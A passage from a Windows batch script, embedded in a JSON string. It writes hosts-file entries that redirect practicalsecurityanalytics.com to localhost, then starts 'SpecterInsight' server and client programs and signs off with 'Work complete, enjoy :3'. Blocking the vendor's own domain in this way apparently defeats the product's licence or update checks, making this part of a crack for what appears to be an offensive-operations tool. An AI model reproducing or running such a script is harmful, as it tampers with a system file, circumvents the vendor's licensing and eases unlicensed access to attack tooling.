www.practicalsecurityanalytics.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1 practicalsecurityanalytics.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo 127.0.0.1 practicalsecurityanalytics.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1 www.practicalsecurityanalytics.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1 www.practicalsecurityanalytics.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1 practicalsecurityanalytics.com\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo ::1 practicalsecurityanalytics.com.\n>> \"%SYSTEMROOT%\\System32\\drivers\\etc\\hosts\" echo.\n\ncls\necho.\necho ^[5^/5^] Starting server and client\nstart SpecterInsight\\server\\SpecterInsight.Server.Host.exe 1>nul 2>nul\nstart SpecterInsight\\client\\SpecterInsight.UI.exe\n\ncls\necho.\necho.\necho Work complete, enjoy ^:3\ntimeout /T 5\nexit\n"
  }
]